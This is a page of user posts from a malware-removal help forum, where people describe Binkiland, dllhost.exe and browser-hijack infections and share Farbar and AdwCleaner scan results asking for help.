**NOTE**malawarebytes.txt Above is the first log, attached is log 1 and 2. I previously posted this same post in error with log 1 plus log 2 as a reply but this is the correction! Thanks!
  22. Hello, I was following along in another topic trying to remove Binkiland using FARBAR when I realized that the directions are specific to each user. I think I'm in over my head and I need some help. I downloaded FRST64 and it scanned and placed FRST and Addition to my desktop. Any help you can give me is appreciated. Thanks!
  23. Hello. Came on forum on October 28th with same issue. dllhost.exe running about 20 instances and eating up memory. Problem seemed fixed on October 28th through this forum, but it must have been buried deep because it is back. Noticed problems with my screen saver, Avira antivirus doing weird things and my wireless adapter flashing crazily. Checked Task Manager and sure enough, the dllhost.exe COM surrogate is replicating and bogging down my computer. I hope that's all it's doing..... Anyway, I ran the FARBAR utility and am attaching the FRST and ADDITION results to see if maybe someone can help get rid of this dang malware once and for all. In the meantime, I'm going to unhook from the internet until tomorrow to see if there's a reply from a moderator in case there's something nasty going on with this malware infection. Thanks, Todd. Addition.txt FRST.txt
  24. Struggling with a similar issue as the user that posted this question: https://forums.malwarebytes.org/index.php?/topic/161188-proxy-server-1270019880/ Fiance somehow managed to d/l a virus I can't find much on. Not visible in Programs or Browser Extensions, but has completely hijacked all of my browsers by changing registry files. Ran the initial adwcleaner scan/clean. Turned up: File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage-journal File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_inst.shoppingate.info_0.localstorage File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_inst.shoppingate.info_0.localstorage-journal File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage-journal seemed to be the impetus behind running ads by SASA hijacked content After the adwcleaner scan, ran the advice from TwinHeadedEagle in the above referenced post but ran into a hiccup with the Farbar tool. Followed the advice, but any time I tried to run a fix, I get the following message followed by an autoshutdown of the Farbar tool: "Warning: Looks like you don't know what to do. To prevent damage to the system the tool will exit." How can I complete the process/fix? Do I need to attach my fixlist/addition .txt files and have a custom list made? Would that even work with this error message involved?
  25. Hi. The mb results.txt, and Farbar scan reports are attached. Please help. FRST.txt Addition.txt mb results.txt
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.